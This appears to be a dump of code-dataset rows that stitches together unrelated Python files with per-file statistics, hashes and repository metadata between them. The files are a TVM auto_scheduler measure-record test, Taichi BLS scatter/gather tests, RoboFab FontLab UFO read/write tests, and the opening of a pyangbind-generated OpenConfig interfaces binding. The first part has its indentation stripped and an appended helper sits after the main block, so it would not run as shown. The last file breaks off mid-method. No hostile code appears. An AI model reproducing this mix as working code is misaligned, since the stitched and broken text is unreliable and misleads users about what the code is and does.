task_inputs_overwrite=True,
)
inp = auto_scheduler.measure.MeasureInput(task, task.compute_dag.init_state)
res = auto_scheduler.measure.MeasureResult([0.1], 0, "", 0.2, 1)
measure_record = auto_scheduler.measure_record.dump_record_to_string(inp, res)
measure_log = auto_scheduler.measure_record.load_record_from_string(measure_record)
new_task = measure_log[0].task
assert task.workload_key == new_task.workload_key
assert str(task.target) == str(new_task.target)
assert str(task.target.host) == str(new_task.target.host)
assert task.layout_rewrite_option == new_task.layout_rewrite_option
assert len(new_task.task_input_names) == 1
assert new_task.task_input_names[0] == "test_input_0"
# Log with multiple task inputs
test_input_1 = tvm.runtime.ndarray.empty((64, 64))
task = auto_scheduler.SearchTask(
func=matmul_auto_scheduler_test,
args=(512, 512, 512),
target="llvm",
task_inputs={
"test_input_0": test_input_0,
"test_input_1": test_input_1,
},
task_inputs_overwrite=True,
)
inp = auto_scheduler.measure.MeasureInput(task, task.compute_dag.init_state)
res = auto_scheduler.measure.MeasureResult([0.1], 0, "", 0.2, 1)
measure_record = auto_scheduler.measure_record.dump_record_to_string(inp, res)
measure_log = auto_scheduler.measure_record.load_record_from_string(measure_record)
new_task = measure_log[0].task
assert task.workload_key == new_task.workload_key
assert str(task.target) == str(new_task.target)
assert str(task.target.host) == str(new_task.target.host)
assert task.layout_rewrite_option == new_task.layout_rewrite_option
assert len(new_task.task_input_names) == 2
assert new_task.task_input_names[0] == "test_input_0"
assert new_task.task_input_names[1] == "test_input_1"
# Log with version 0.5
v5_log = """{"i": [["[\\\"matmul_auto_scheduler_test\\\", 512, 512, 512]", "llvm -keys=cpu", [6, 64, 64, 0, 0, 0, 0, 0], "", 1], [[], []]], "r": [[0.1], 0, 0.2, 1], "v": "v0.6"}"""
measure_log = auto_scheduler.measure_record.load_record_from_string(v5_log)
new_task = measure_log[0].task
assert task.workload_key == new_task.workload_key
assert str(task.target) == str(new_task.target)
assert str(task.target.host) == str(new_task.target.host)
assert task.layout_rewrite_option == new_task.layout_rewrite_option
assert len(new_task.task_input_names) == 0
if __name__ == "__main__":
test_search_task_add_task_input()
test_search_task_record()
test_recover_measure_input_with_task_input()
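# Condensed sketch of the serialize/deserialize round trip exercised above,
# using only APIs already present in this file:
def _roundtrip_example():
    task = auto_scheduler.SearchTask(
        func=matmul_auto_scheduler_test, args=(64, 64, 64), target="llvm"
    )
    record = auto_scheduler._ffi_api.SerializeSearchTask(task)
    restored = auto_scheduler._ffi_api.DeserializeSearchTask(record)
    assert restored.workload_key == task.workload_key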
| 42.25
| 184
| 0.716431
| 1,278
| 8,788
| 4.604069
| 0.13615
| 0.061863
| 0.041978
| 0.048946
| 0.800986
| 0.78569
| 0.777362
| 0.753229
| 0.7483
| 0.736234
| 0
| 0.026796
| 0.176149
| 8,788
| 207
| 185
| 42.454106
| 0.785912
| 0.124829
| 0
| 0.72956
| 0
| 0.012579
| 0.080679
| 0.023629
| 0
| 0
| 0
| 0.004831
| 0.301887
| 1
| 0.018868
| false
| 0
| 0.044025
| 0
| 0.062893
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
919c6a65fed478261d02cf231b0e54aa32771f41
| 1,344
|
py
|
Python
|
tests/python/test_bls_assume_in_range.py
|
kxxt/taichi
|
15f39b79c258080f1e34fcbdc29646d9ced0a4fe
|
[
"MIT"
] | 11,699
|
2020-01-09T03:02:46.000Z
|
2022-03-31T20:59:08.000Z
|
tests/python/test_bls_assume_in_range.py
|
kxxt/taichi
|
15f39b79c258080f1e34fcbdc29646d9ced0a4fe
|
[
"MIT"
] | 3,589
|
2020-01-09T03:18:25.000Z
|
2022-03-31T19:06:42.000Z
|
tests/python/test_bls_assume_in_range.py
|
kxxt/taichi
|
15f39b79c258080f1e34fcbdc29646d9ced0a4fe
|
[
"MIT"
] | 1,391
|
2020-01-09T03:02:54.000Z
|
2022-03-31T08:44:29.000Z
|
import taichi as ti
from .bls_test_template import bls_particle_grid
@ti.test(require=ti.extension.bls)
def test_scattering():
bls_particle_grid(N=128,
ppc=10,
block_size=8,
scatter=True,
use_offset=False)
@ti.test(require=ti.extension.bls)
def test_scattering_offset():
bls_particle_grid(N=128,
ppc=10,
block_size=8,
scatter=True,
use_offset=True)
@ti.test(require=ti.extension.bls)
def test_scattering_two_pointer_levels():
bls_particle_grid(N=128,
ppc=10,
block_size=8,
scatter=True,
pointer_level=2,
use_offset=False)
@ti.test(require=ti.extension.bls)
def test_gathering():
bls_particle_grid(N=128,
ppc=10,
block_size=8,
scatter=False,
use_offset=False)
@ti.test(require=ti.extension.bls)
def test_gathering_offset():
bls_particle_grid(N=128,
ppc=10,
block_size=8,
scatter=False,
use_offset=True)
# TODO: debug mode behavior of assume_in_range
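# Hypothetical additional case illustrating the same gating pattern above:
# ti.test skips the body when the active backend lacks BLS support.
@ti.test(require=ti.extension.bls)
def test_gathering_two_pointer_levels():
    bls_particle_grid(N=128,
                      ppc=10,
                      block_size=8,
                      scatter=False,
                      pointer_level=2,
                      use_offset=False)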
| 25.358491
| 48
| 0.508185
| 148
| 1,344
| 4.364865
| 0.27027
| 0.102167
| 0.139319
| 0.116099
| 0.80031
| 0.80031
| 0.80031
| 0.80031
| 0.80031
| 0.648607
| 0
| 0.039092
| 0.40997
| 1,344
| 52
| 49
| 25.846154
| 0.775536
| 0.032738
| 0
| 0.789474
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.019231
| 0
| 1
| 0.131579
| true
| 0
| 0.052632
| 0
| 0.184211
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 1
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
|
0
| 9
|
91c072d2620e318568a27f670f23a1ad8e77b262
| 20,218
|
py
|
Python
|
Lib/robofab/test/test_fontLabUFOReadWrite.py
|
Vectro-Type-Foundry/robofab
|
cd65d78292d24358c98dce53d283314cdc85878e
|
[
"BSD-3-Clause"
] | 61
|
2015-01-17T10:15:45.000Z
|
2018-12-02T13:53:02.000Z
|
Lib/robofab/test/test_fontLabUFOReadWrite.py
|
Vectro-Type-Foundry/robofab
|
cd65d78292d24358c98dce53d283314cdc85878e
|
[
"BSD-3-Clause"
] | 37
|
2015-01-05T23:44:56.000Z
|
2018-03-16T19:05:28.000Z
|
Lib/robofab/test/test_fontLabUFOReadWrite.py
|
Vectro-Type-Foundry/robofab
|
cd65d78292d24358c98dce53d283314cdc85878e
|
[
"BSD-3-Clause"
] | 25
|
2015-01-08T19:49:36.000Z
|
2018-10-29T00:36:46.000Z
|
import os
import shutil
import unittest
import tempfile
from robofab.plistlib import readPlist
import robofab
from robofab.ufoLib import UFOReader, UFOWriter
from robofab.test.testSupport import fontInfoVersion2, expectedFontInfo1To2Conversion
from robofab.objects.objectsFL import NewFont, OpenFont
vfbPath = os.path.dirname(robofab.__file__)
vfbPath = os.path.dirname(vfbPath)
vfbPath = os.path.dirname(vfbPath)
vfbPath = os.path.join(vfbPath, "TestData", "TestFont1.vfb")
ufoPath1 = os.path.dirname(robofab.__file__)
ufoPath1 = os.path.dirname(ufoPath1)
ufoPath1 = os.path.dirname(ufoPath1)
ufoPath1 = os.path.join(ufoPath1, "TestData", "TestFont1 (UFO1).ufo")
ufoPath2 = ufoPath1.replace("TestFont1 (UFO1).ufo", "TestFont1 (UFO2).ufo")
expectedFormatVersion1Features = """@myClass = [A B];
feature liga {
sub A A by b;
} liga;
"""
# robofab should remove these from the lib after a load.
removeFromFormatVersion1Lib = [
"org.robofab.opentype.classes",
"org.robofab.opentype.features",
"org.robofab.opentype.featureorder",
"org.robofab.postScriptHintData"
]
class ReadUFOFormatVersion1TestCase(unittest.TestCase):
def setUpFont(self, doInfo=False, doKerning=False, doGroups=False, doLib=False, doFeatures=False):
self.font = NewFont()
self.ufoPath = ufoPath1
self.font.readUFO(ufoPath1, doInfo=doInfo, doKerning=doKerning, doGroups=doGroups, doLib=doLib, doFeatures=doFeatures)
self.font.update()
def tearDownFont(self):
self.font.close()
self.font = None
def compareToUFO(self, doInfo=True, doKerning=True, doGroups=True, doLib=True, doFeatures=True):
reader = UFOReader(self.ufoPath)
results = {}
if doInfo:
infoMatches = True
info = self.font.info
for attr, expectedValue in expectedFontInfo1To2Conversion.items():
writtenValue = getattr(info, attr)
if expectedValue != writtenValue:
infoMatches = False
break
results["info"]= infoMatches
if doKerning:
kerning = self.font.kerning.asDict()
expectedKerning = reader.readKerning()
results["kerning"] = expectedKerning == kerning
if doGroups:
groups = dict(self.font.groups)
expectedGroups = reader.readGroups()
results["groups"] = expectedGroups == groups
if doFeatures:
features = self.font.features.text
expectedFeatures = expectedFormatVersion1Features
# FontLab likes to add lines to the features, so skip blank lines.
features = [line for line in features.splitlines() if line]
expectedFeatures = [line for line in expectedFeatures.splitlines() if line]
results["features"] = expectedFeatures == features
if doLib:
lib = dict(self.font.lib)
expectedLib = reader.readLib()
for key in removeFromFormatVersion1Lib:
if key in expectedLib:
del expectedLib[key]
results["lib"] = expectedLib == lib
return results
def testFull(self):
self.setUpFont(doInfo=True, doKerning=True, doGroups=True, doFeatures=True, doLib=True)
otherResults = self.compareToUFO()
self.assertEqual(otherResults["info"], True)
self.assertEqual(otherResults["kerning"], True)
self.assertEqual(otherResults["groups"], True)
self.assertEqual(otherResults["features"], True)
self.assertEqual(otherResults["lib"], True)
self.tearDownFont()
def testInfo(self):
self.setUpFont(doInfo=True)
otherResults = self.compareToUFO(doInfo=False)
self.assertEqual(otherResults["kerning"], False)
self.assertEqual(otherResults["groups"], False)
self.assertEqual(otherResults["features"], False)
self.assertEqual(otherResults["lib"], False)
info = self.font.info
for attr, expectedValue in expectedFontInfo1To2Conversion.items():
writtenValue = getattr(info, attr)
self.assertEqual((attr, expectedValue), (attr, writtenValue))
self.tearDownFont()
def testFeatures(self):
self.setUpFont(doFeatures=True)
otherResults = self.compareToUFO()
self.assertEqual(otherResults["info"], False)
self.assertEqual(otherResults["kerning"], False)
self.assertEqual(otherResults["groups"], False)
self.assertEqual(otherResults["features"], True)
self.assertEqual(otherResults["lib"], False)
self.tearDownFont()
def testKerning(self):
self.setUpFont(doKerning=True)
otherResults = self.compareToUFO()
self.assertEqual(otherResults["info"], False)
self.assertEqual(otherResults["kerning"], True)
self.assertEqual(otherResults["groups"], False)
self.assertEqual(otherResults["features"], False)
self.assertEqual(otherResults["lib"], False)
self.tearDownFont()
def testGroups(self):
self.setUpFont(doGroups=True)
otherResults = self.compareToUFO()
self.assertEqual(otherResults["info"], False)
self.assertEqual(otherResults["kerning"], False)
self.assertEqual(otherResults["groups"], True)
self.assertEqual(otherResults["features"], False)
self.assertEqual(otherResults["lib"], False)
self.tearDownFont()
def testLib(self):
self.setUpFont(doLib=True)
otherResults = self.compareToUFO()
self.assertEqual(otherResults["info"], False)
self.assertEqual(otherResults["kerning"], False)
self.assertEqual(otherResults["groups"], False)
self.assertEqual(otherResults["features"], False)
self.assertEqual(otherResults["lib"], True)
self.tearDownFont()
class ReadUFOFormatVersion2TestCase(unittest.TestCase):
def setUpFont(self, doInfo=False, doKerning=False, doGroups=False, doLib=False, doFeatures=False):
self.font = NewFont()
self.ufoPath = ufoPath2
self.font.readUFO(ufoPath2, doInfo=doInfo, doKerning=doKerning, doGroups=doGroups, doLib=doLib, doFeatures=doFeatures)
self.font.update()
def tearDownFont(self):
self.font.close()
self.font = None
def compareToUFO(self, doInfo=True, doKerning=True, doGroups=True, doLib=True, doFeatures=True):
reader = UFOReader(self.ufoPath)
results = {}
if doInfo:
infoMatches = True
info = self.font.info
for attr, expectedValue in fontInfoVersion2.items():
# cheat by skipping attrs that aren't supported
if info._ufoToFLAttrMapping[attr]["nakedAttribute"] is None:
continue
writtenValue = getattr(info, attr)
if expectedValue != writtenValue:
infoMatches = False
break
results["info"]= infoMatches
if doKerning:
kerning = self.font.kerning.asDict()
expectedKerning = reader.readKerning()
results["kerning"] = expectedKerning == kerning
if doGroups:
groups = dict(self.font.groups)
expectedGroups = reader.readGroups()
results["groups"] = expectedGroups == groups
if doFeatures:
features = self.font.features.text
expectedFeatures = reader.readFeatures()
results["features"] = expectedFeatures == features
if doLib:
lib = dict(self.font.lib)
expectedLib = reader.readLib()
results["lib"] = expectedLib == lib
return results
def testFull(self):
self.setUpFont(doInfo=True, doKerning=True, doGroups=True, doFeatures=True, doLib=True)
otherResults = self.compareToUFO()
self.assertEqual(otherResults["info"], True)
self.assertEqual(otherResults["kerning"], True)
self.assertEqual(otherResults["groups"], True)
self.assertEqual(otherResults["features"], True)
self.assertEqual(otherResults["lib"], True)
self.tearDownFont()
def testInfo(self):
self.setUpFont(doInfo=True)
otherResults = self.compareToUFO(doInfo=False)
self.assertEqual(otherResults["kerning"], False)
self.assertEqual(otherResults["groups"], False)
self.assertEqual(otherResults["features"], False)
self.assertEqual(otherResults["lib"], False)
info = self.font.info
for attr, expectedValue in fontInfoVersion2.items():
# cheat by skipping attrs that aren't supported
if info._ufoToFLAttrMapping[attr]["nakedAttribute"] is None:
continue
writtenValue = getattr(info, attr)
self.assertEqual((attr, expectedValue), (attr, writtenValue))
self.tearDownFont()
def testFeatures(self):
self.setUpFont(doFeatures=True)
otherResults = self.compareToUFO()
self.assertEqual(otherResults["info"], False)
self.assertEqual(otherResults["kerning"], False)
self.assertEqual(otherResults["groups"], False)
self.assertEqual(otherResults["features"], True)
self.assertEqual(otherResults["lib"], False)
self.tearDownFont()
def testKerning(self):
self.setUpFont(doKerning=True)
otherResults = self.compareToUFO()
self.assertEqual(otherResults["info"], False)
self.assertEqual(otherResults["kerning"], True)
self.assertEqual(otherResults["groups"], False)
self.assertEqual(otherResults["features"], False)
self.assertEqual(otherResults["lib"], False)
self.tearDownFont()
def testGroups(self):
self.setUpFont(doGroups=True)
otherResults = self.compareToUFO()
self.assertEqual(otherResults["info"], False)
self.assertEqual(otherResults["kerning"], False)
self.assertEqual(otherResults["groups"], True)
self.assertEqual(otherResults["features"], False)
self.assertEqual(otherResults["lib"], False)
self.tearDownFont()
def testLib(self):
self.setUpFont(doLib=True)
otherResults = self.compareToUFO()
self.assertEqual(otherResults["info"], False)
self.assertEqual(otherResults["kerning"], False)
self.assertEqual(otherResults["groups"], False)
self.assertEqual(otherResults["features"], False)
self.assertEqual(otherResults["lib"], True)
self.tearDownFont()
class WriteUFOFormatVersion1TestCase(unittest.TestCase):
def setUpFont(self, doInfo=False, doKerning=False, doGroups=False):
self.dstDir = tempfile.mktemp()
os.mkdir(self.dstDir)
self.font = OpenFont(vfbPath)
self.font.writeUFO(self.dstDir, doInfo=doInfo, doKerning=doKerning, doGroups=doGroups, formatVersion=1)
self.font.close()
def tearDownFont(self):
shutil.rmtree(self.dstDir)
def compareToUFO(self, doInfo=True, doKerning=True, doGroups=True, doLib=True, doFeatures=True):
readerExpected = UFOReader(ufoPath1)
readerWritten = UFOReader(self.dstDir)
results = {}
if doInfo:
matches = True
expectedPath = os.path.join(ufoPath1, "fontinfo.plist")
writtenPath = os.path.join(self.dstDir, "fontinfo.plist")
if not os.path.exists(writtenPath):
matches = False
else:
expected = readPlist(expectedPath)
written = readPlist(writtenPath)
for attr, expectedValue in expected.items():
if expectedValue != written[attr]:
matches = False
break
results["info"] = matches
if doKerning:
matches = True
expectedPath = os.path.join(ufoPath1, "kerning.plist")
writtenPath = os.path.join(self.dstDir, "kerning.plist")
if not os.path.exists(writtenPath):
matches = False
else:
matches = readPlist(expectedPath) == readPlist(writtenPath)
results["kerning"] = matches
if doGroups:
matches = True
expectedPath = os.path.join(ufoPath1, "groups.plist")
writtenPath = os.path.join(self.dstDir, "groups.plist")
if not os.path.exists(writtenPath):
matches = False
else:
matches = readPlist(expectedPath) == readPlist(writtenPath)
results["groups"] = matches
if doFeatures:
matches = True
featuresPath = os.path.join(self.dstDir, "features.fea")
libPath = os.path.join(self.dstDir, "lib.plist")
if os.path.exists(featuresPath):
matches = False
else:
fontLib = readPlist(libPath)
writtenText = [fontLib.get("org.robofab.opentype.classes", "")]
features = fontLib.get("org.robofab.opentype.features", {})
featureOrder = fontLib.get("org.robofab.opentype.featureorder", [])
for featureName in featureOrder:
writtenText.append(features.get(featureName, ""))
writtenText = "\n".join(writtenText)
# FontLab likes to add lines to the features, so skip blank lines.
expectedText = [line for line in expectedFormatVersion1Features.splitlines() if line]
writtenText = [line for line in writtenText.splitlines() if line]
matches = "\n".join(expectedText) == "\n".join(writtenText)
results["features"] = matches
if doLib:
matches = True
expectedPath = os.path.join(ufoPath1, "lib.plist")
writtenPath = os.path.join(self.dstDir, "lib.plist")
if not os.path.exists(writtenPath):
matches = False
else:
# the test file doesn't have the glyph order
# so purge it from the written
writtenLib = readPlist(writtenPath)
del writtenLib["org.robofab.glyphOrder"]
matches = readPlist(expectedPath) == writtenLib
results["lib"] = matches
return results
def testFull(self):
self.setUpFont(doInfo=True, doKerning=True, doGroups=True)
otherResults = self.compareToUFO()
self.assertEqual(otherResults["info"], True)
self.assertEqual(otherResults["kerning"], True)
self.assertEqual(otherResults["groups"], True)
self.assertEqual(otherResults["features"], True)
self.assertEqual(otherResults["lib"], True)
self.tearDownFont()
def testInfo(self):
self.setUpFont(doInfo=True)
otherResults = self.compareToUFO(doInfo=False)
self.assertEqual(otherResults["kerning"], False)
self.assertEqual(otherResults["groups"], False)
expectedPath = os.path.join(ufoPath1, "fontinfo.plist")
writtenPath = os.path.join(self.dstDir, "fontinfo.plist")
expected = readPlist(expectedPath)
written = readPlist(writtenPath)
for attr, expectedValue in expected.items():
self.assertEqual((attr, expectedValue), (attr, written[attr]))
self.tearDownFont()
def testFeatures(self):
self.setUpFont()
otherResults = self.compareToUFO()
self.assertEqual(otherResults["info"], False)
self.assertEqual(otherResults["kerning"], False)
self.assertEqual(otherResults["groups"], False)
self.assertEqual(otherResults["features"], True)
self.tearDownFont()
def testKerning(self):
self.setUpFont(doKerning=True)
otherResults = self.compareToUFO()
self.assertEqual(otherResults["info"], False)
self.assertEqual(otherResults["kerning"], True)
self.assertEqual(otherResults["groups"], False)
self.tearDownFont()
def testGroups(self):
self.setUpFont(doGroups=True)
otherResults = self.compareToUFO()
self.assertEqual(otherResults["info"], False)
self.assertEqual(otherResults["kerning"], False)
self.assertEqual(otherResults["groups"], True)
self.tearDownFont()
def testLib(self):
self.setUpFont()
otherResults = self.compareToUFO()
self.assertEqual(otherResults["info"], False)
self.assertEqual(otherResults["kerning"], False)
self.assertEqual(otherResults["groups"], False)
self.assertEqual(otherResults["lib"], True)
self.tearDownFont()
class WriteUFOFormatVersion2TestCase(unittest.TestCase):
def setUpFont(self, doInfo=False, doKerning=False, doGroups=False, doLib=False, doFeatures=False):
self.dstDir = tempfile.mktemp()
os.mkdir(self.dstDir)
self.font = OpenFont(vfbPath)
self.font.writeUFO(self.dstDir, doInfo=doInfo, doKerning=doKerning, doGroups=doGroups, doLib=doLib, doFeatures=doFeatures)
self.font.close()
def tearDownFont(self):
shutil.rmtree(self.dstDir)
def compareToUFO(self, doInfo=True, doKerning=True, doGroups=True, doLib=True, doFeatures=True):
readerExpected = UFOReader(ufoPath2)
readerWritten = UFOReader(self.dstDir)
results = {}
if doInfo:
matches = True
expectedPath = os.path.join(ufoPath2, "fontinfo.plist")
writtenPath = os.path.join(self.dstDir, "fontinfo.plist")
if not os.path.exists(writtenPath):
matches = False
else:
dummyFont = NewFont()
_ufoToFLAttrMapping = dict(dummyFont.info._ufoToFLAttrMapping)
dummyFont.close()
expected = readPlist(expectedPath)
written = readPlist(writtenPath)
for attr, expectedValue in expected.items():
# cheat by skipping attrs that aren't supported
if _ufoToFLAttrMapping[attr]["nakedAttribute"] is None:
continue
if expectedValue != written[attr]:
matches = False
break
results["info"] = matches
if doKerning:
matches = True
expectedPath = os.path.join(ufoPath2, "kerning.plist")
writtenPath = os.path.join(self.dstDir, "kerning.plist")
if not os.path.exists(writtenPath):
matches = False
else:
matches = readPlist(expectedPath) == readPlist(writtenPath)
results["kerning"] = matches
if doGroups:
matches = True
expectedPath = os.path.join(ufoPath2, "groups.plist")
writtenPath = os.path.join(self.dstDir, "groups.plist")
if not os.path.exists(writtenPath):
matches = False
else:
matches = readPlist(expectedPath) == readPlist(writtenPath)
results["groups"] = matches
if doFeatures:
matches = True
expectedPath = os.path.join(ufoPath2, "features.fea")
writtenPath = os.path.join(self.dstDir, "features.fea")
if not os.path.exists(writtenPath):
matches = False
else:
f = open(expectedPath, "r")
expectedText = f.read()
f.close()
f = open(writtenPath, "r")
writtenText = f.read()
f.close()
# FontLab likes to add lines to the features, so skip blank lines.
expectedText = [line for line in expectedText.splitlines() if line]
writtenText = [line for line in writtenText.splitlines() if line]
matches = "\n".join(expectedText) == "\n".join(writtenText)
results["features"] = matches
if doLib:
matches = True
expectedPath = os.path.join(ufoPath2, "lib.plist")
writtenPath = os.path.join(self.dstDir, "lib.plist")
if not os.path.exists(writtenPath):
matches = False
else:
# the test file doesn't have the glyph order
# so purge it from the written
writtenLib = readPlist(writtenPath)
del writtenLib["org.robofab.glyphOrder"]
matches = readPlist(expectedPath) == writtenLib
results["lib"] = matches
return results
def testFull(self):
self.setUpFont(doInfo=True, doKerning=True, doGroups=True, doFeatures=True, doLib=True)
otherResults = self.compareToUFO()
self.assertEqual(otherResults["info"], True)
self.assertEqual(otherResults["kerning"], True)
self.assertEqual(otherResults["groups"], True)
self.assertEqual(otherResults["features"], True)
self.assertEqual(otherResults["lib"], True)
self.tearDownFont()
def testInfo(self):
self.setUpFont(doInfo=True)
otherResults = self.compareToUFO(doInfo=False)
self.assertEqual(otherResults["kerning"], False)
self.assertEqual(otherResults["groups"], False)
self.assertEqual(otherResults["features"], False)
self.assertEqual(otherResults["lib"], False)
expectedPath = os.path.join(ufoPath2, "fontinfo.plist")
writtenPath = os.path.join(self.dstDir, "fontinfo.plist")
expected = readPlist(expectedPath)
written = readPlist(writtenPath)
dummyFont = NewFont()
_ufoToFLAttrMapping = dict(dummyFont.info._ufoToFLAttrMapping)
dummyFont.close()
for attr, expectedValue in expected.items():
# cheat by skipping attrs that aren't supported
if _ufoToFLAttrMapping[attr]["nakedAttribute"] is None:
continue
self.assertEqual((attr, expectedValue), (attr, written[attr]))
self.tearDownFont()
def testFeatures(self):
self.setUpFont(doFeatures=True)
otherResults = self.compareToUFO()
self.assertEqual(otherResults["info"], False)
self.assertEqual(otherResults["kerning"], False)
self.assertEqual(otherResults["groups"], False)
self.assertEqual(otherResults["features"], True)
self.assertEqual(otherResults["lib"], False)
self.tearDownFont()
def testKerning(self):
self.setUpFont(doKerning=True)
otherResults = self.compareToUFO()
self.assertEqual(otherResults["info"], False)
self.assertEqual(otherResults["kerning"], True)
self.assertEqual(otherResults["groups"], False)
self.assertEqual(otherResults["features"], False)
self.assertEqual(otherResults["lib"], False)
self.tearDownFont()
def testGroups(self):
self.setUpFont(doGroups=True)
otherResults = self.compareToUFO()
self.assertEqual(otherResults["info"], False)
self.assertEqual(otherResults["kerning"], False)
self.assertEqual(otherResults["groups"], True)
self.assertEqual(otherResults["features"], False)
self.assertEqual(otherResults["lib"], False)
self.tearDownFont()
def testLib(self):
self.setUpFont(doLib=True)
otherResults = self.compareToUFO()
self.assertEqual(otherResults["info"], False)
self.assertEqual(otherResults["kerning"], False)
self.assertEqual(otherResults["groups"], False)
self.assertEqual(otherResults["features"], False)
self.assertEqual(otherResults["lib"], True)
self.tearDownFont()
if __name__ == "__main__":
from robofab.test.testSupport import runTests
runTests()
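# A stdlib-only alternative sketch for running a single suite above (requires
# FontLab's embedded Python, since objectsFL wraps the FontLab API):
#
#     import unittest
#     suite = unittest.TestLoader().loadTestsFromTestCase(ReadUFOFormatVersion2TestCase)
#     unittest.TextTestRunner(verbosity=2).run(suite)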
| 35.720848
| 124
| 0.735681
| 2,232
| 20,218
| 6.653226
| 0.081989
| 0.113131
| 0.196364
| 0.133603
| 0.902963
| 0.889764
| 0.889024
| 0.878114
| 0.866734
| 0.850707
| 0
| 0.002974
| 0.135078
| 20,218
| 565
| 125
| 35.784071
| 0.846229
| 0.028539
| 0
| 0.854
| 0
| 0
| 0.076218
| 0.012941
| 0
| 0
| 0
| 0
| 0.224
| 1
| 0.072
| false
| 0
| 0.02
| 0
| 0.108
| 0
| 0
| 0
| 0
| null | 0
| 1
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
53327b75d25ba5f1eda75bbe94ebad66dc92d777
| 75,794
|
py
|
Python
|
ocbind/__init__.py
|
SeanCondon/onos-config-demo
|
0789d397b46fd5cda512ae7fffe35e1a4bfdfdbe
|
[
"Apache-2.0"
] | 1
|
2019-08-01T17:42:57.000Z
|
2019-08-01T17:42:57.000Z
|
ocbind/__init__.py
|
SeanCondon/onos-config-demo
|
0789d397b46fd5cda512ae7fffe35e1a4bfdfdbe
|
[
"Apache-2.0"
] | 1
|
2021-05-26T16:38:04.000Z
|
2021-05-26T16:38:04.000Z
|
ocbind/__init__.py
|
SeanCondon/onos-config-demo
|
0789d397b46fd5cda512ae7fffe35e1a4bfdfdbe
|
[
"Apache-2.0"
] | 4
|
2019-07-24T16:52:39.000Z
|
2021-12-03T02:08:13.000Z
|
# -*- coding: utf-8 -*-
from operator import attrgetter
import pyangbind.lib.xpathhelper as xpathhelper
from pyangbind.lib.yangtypes import RestrictedPrecisionDecimalType
from pyangbind.lib.yangtypes import RestrictedClassType
from pyangbind.lib.yangtypes import TypedListType
from pyangbind.lib.yangtypes import YANGBool
from pyangbind.lib.yangtypes import YANGListType
from pyangbind.lib.yangtypes import YANGDynClass
from pyangbind.lib.yangtypes import ReferenceType
from pyangbind.lib.base import PybindBase
from collections import OrderedDict
from decimal import Decimal
from bitarray import bitarray
import six
# PY3 support of some PY2 keywords (needs improvement)
if six.PY3:
import builtins as __builtin__
long = int
elif six.PY2:
import __builtin__
from . import interfaces
class openconfig_interfaces(PybindBase):
"""
This class was auto-generated by the PythonClass plugin for PYANG
from YANG module openconfig-interfaces - based on the path /openconfig-interfaces. Each member element of
the container is represented as a class variable - with a specific
YANG type.
YANG Description: Model for managing network interfaces and subinterfaces. This
module also defines convenience types / groupings for other
models to create references to interfaces:
base-interface-ref (type) - reference to a base interface
interface-ref (grouping) - container for reference to an
interface + subinterface
interface-ref-state (grouping) - container for read-only
(opstate) reference to interface + subinterface
This model reuses data items defined in the IETF YANG model for
interfaces described by RFC 7223 with an alternate structure
(particularly for operational state data) and with
additional configuration items.
Portions of this code were derived from IETF RFC 7223.
Please reproduce this note if possible.
IETF code is subject to the following copyright and license:
Copyright (c) IETF Trust and the persons identified as authors of
the code.
All rights reserved.
Redistribution and use in source and binary forms, with or without
modification, is permitted pursuant to, and subject to the license
terms contained in, the Simplified BSD License set forth in
Section 4.c of the IETF Trust's Legal Provisions Relating
to IETF Documents (http://trustee.ietf.org/license-info).
"""
__slots__ = ('_path_helper', '_extmethods', '__interfaces',)
_yang_name = 'openconfig-interfaces'
_pybind_generated_by = 'container'
def __init__(self, *args, **kwargs):
helper = kwargs.pop("path_helper", None)
if helper is False:
self._path_helper = False
elif helper is not None and isinstance(helper, xpathhelper.YANGPathHelper):
self._path_helper = helper
elif hasattr(self, "_parent"):
helper = getattr(self._parent, "_path_helper", False)
self._path_helper = helper
else:
self._path_helper = False
self._extmethods = False
self.__interfaces = YANGDynClass(base=interfaces.interfaces, is_container='container', yang_name="interfaces", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions=None, namespace='http://openconfig.net/yang/interfaces', defining_module='openconfig-interfaces', yang_type='container', is_config=True)
load = kwargs.pop("load", None)
if args:
if len(args) > 1:
raise TypeError("cannot create a YANG container with >1 argument")
all_attr = True
for e in self._pyangbind_elements:
if not hasattr(args[0], e):
all_attr = False
break
if not all_attr:
raise ValueError("Supplied object did not have the correct attributes")
for e in self._pyangbind_elements:
nobj = getattr(args[0], e)
if nobj._changed() is False:
continue
setmethod = getattr(self, "_set_%s" % e)
if load is None:
setmethod(getattr(args[0], e))
else:
setmethod(getattr(args[0], e), load=load)
def _path(self):
if hasattr(self, "_parent"):
return self._parent._path()+[self._yang_name]
else:
return []
def _get_interfaces(self):
"""
Getter method for interfaces, mapped from YANG variable /interfaces (container)
YANG Description: Top level container for interfaces, including configuration
and state data.
"""
return self.__interfaces
def _set_interfaces(self, v, load=False):
"""
Setter method for interfaces, mapped from YANG variable /interfaces (container)
If this variable is read-only (config: false) in the
source YANG file, then _set_interfaces is considered a private
method. Backends looking to populate this variable should
do so via calling thisObj._set_interfaces() directly.
YANG Description: Top level container for interfaces, including configuration
and state data.
"""
if hasattr(v, "_utype"):
v = v._utype(v)
try:
t = YANGDynClass(v,base=interfaces.interfaces, is_container='container', yang_name="interfaces", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions=None, namespace='http://openconfig.net/yang/interfaces', defining_module='openconfig-interfaces', yang_type='container', is_config=True)
except (TypeError, ValueError):
raise ValueError({
'error-string': """interfaces must be of a type compatible with container""",
'defined-type': "container",
